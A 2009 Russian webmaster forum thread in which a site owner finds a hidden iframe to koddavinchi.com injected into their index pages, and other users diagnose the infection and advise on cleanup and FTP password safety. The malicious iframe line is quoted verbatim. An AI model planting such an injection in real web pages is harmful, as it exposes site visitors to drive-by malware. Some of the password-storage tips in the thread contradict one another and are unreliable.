Внизу кода появился iframe

12
robot-sgibatel
На сайте с 11.10.2008
Offline
87
1132

Внизу кода всех моих сайтов появилось :

<html><body><div><iframe src="http://koddavinchi.com/my/in.cgi?9" width="320" height="240"></iframe></div></body></html>

Если убрать style="display:none", то внизу появиться окно с гуглом, и если перейти по ссылке выше, то редиректит на гугл. Что это такое?

robot-sgibatel добавил 10.06.2009 в 11:22

то что поломали сайт я знаю, но почему показует гугл?

"Радиация убивает только тех, кто ее боится." © Гомер Джей Симпсон (http://esquire.ru/wil/simpson)
Lix
На сайте с 23.09.2007
Offline
55
Lix
#1

*И все полезли на зараженный сайт смотреть "почему гугл"*...

Может это и не гугл вовсе а его копия главной страницы, зараженная вирусом. Сносите, лечите комп, меняйте пароли на фтп (не сохраняйтся их в программах типа CuteFTP) и забудьте о том, что произошло.

Get Rich Or Die Trying
[Удален]
#2
robot-sgibatel:

то что поломали сайт я знаю, но почему показует гугл?

попали под раздачу: видимо это тест(пока) - в следующем фрейме будет конкретнее, готовьтесь..

ставьте cmod 444 на индексные файлы - есть шанс, что не войдете в очередной ботнет

robot-sgibatel
На сайте с 11.10.2008
Offline
87
#3
Может это и не гугл вовсе а его копия главной страницы, зараженная вирусом.

Если пройти по ссылке, то редиректит на гугл.

Сносите, лечите комп

И антивирус, фаерволл стоит...

не сохраняйтся их в программах типа CuteFTP

А можно сохранять в тотал коммандере и в жезле оперы?

fine
На сайте с 01.12.2005
Offline
151
#4
robot-sgibatel:
А можно сохранять в тотал коммандере и в жезле оперы?

Лучше ни в каких программах не сохранять.

robot-sgibatel
На сайте с 11.10.2008
Offline
87
#5
ставьте cmod 444 на индексные файлы - есть шанс, что не войдете в очередной ботнет

Имеете ввиду только index.html или все html файлы?

robot-sgibatel добавил 10.06.2009 в 11:59

Только что заметил, что эта строка появилась только на мордах (index.html), а остальные странички чистые. Это что, судя по тому что написал Dolf, такое можно сделать без проникновения по фтп?

Lix
На сайте с 23.09.2007
Offline
55
Lix
#6

Как правило вирус заражает файлы вида index.*. Но, возможно, вам попался мутант. Сливайте сайт на локальный комп, сканируйте его на этот текст и выкидывайт обратно в сеть. А пароли от ФТП лучше нигде не сохраняться. Кстати, смените пароль на ICQ. Эта зараза ходит парами (у меня именно так и было) - сам номер она не крадет, но спам шлет с него будь здоров.

iren K
На сайте с 28.12.2008
Offline
222
#7
robot-sgibatel:
Если пройти по ссылке, то редиректит на гугл.

И антивирус, фаерволл стоит...

А можно сохранять в тотал коммандере и в жезле оперы?

как раз в cutftp хранить можно (если 8pro и выше), а в тотале крайне не рекомендую

опера - зависит от версии

но Ваш случай скорее другое - имеет место либо банальный перехват сессии, либо со стороны хостера, как обычно :(

c уважением Iren
Lix
На сайте с 23.09.2007
Offline
55
Lix
#8
как раз в cutftp хранить можно (если 8pro и выше), а в тотале крайне не рекомендую

Пару месяцев назад стянули именно из CuteFTP 8 Pro...

Лучше ни в каких программах не сохранять.

Подписываюсь. Так теперь и делаю.

TO
На сайте с 21.09.2007
Offline
170
#9

"Если куры дохнут, так у всей деревни разом."

/ru/forum/363377

Б
На сайте с 30.06.2008
Offline
200
#10

robot-sgibatel, Вы ещё перед </head> посмотрите. Там часто живёт urchin.js. ;)

Будь мудрее. Выгляди глупее.
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий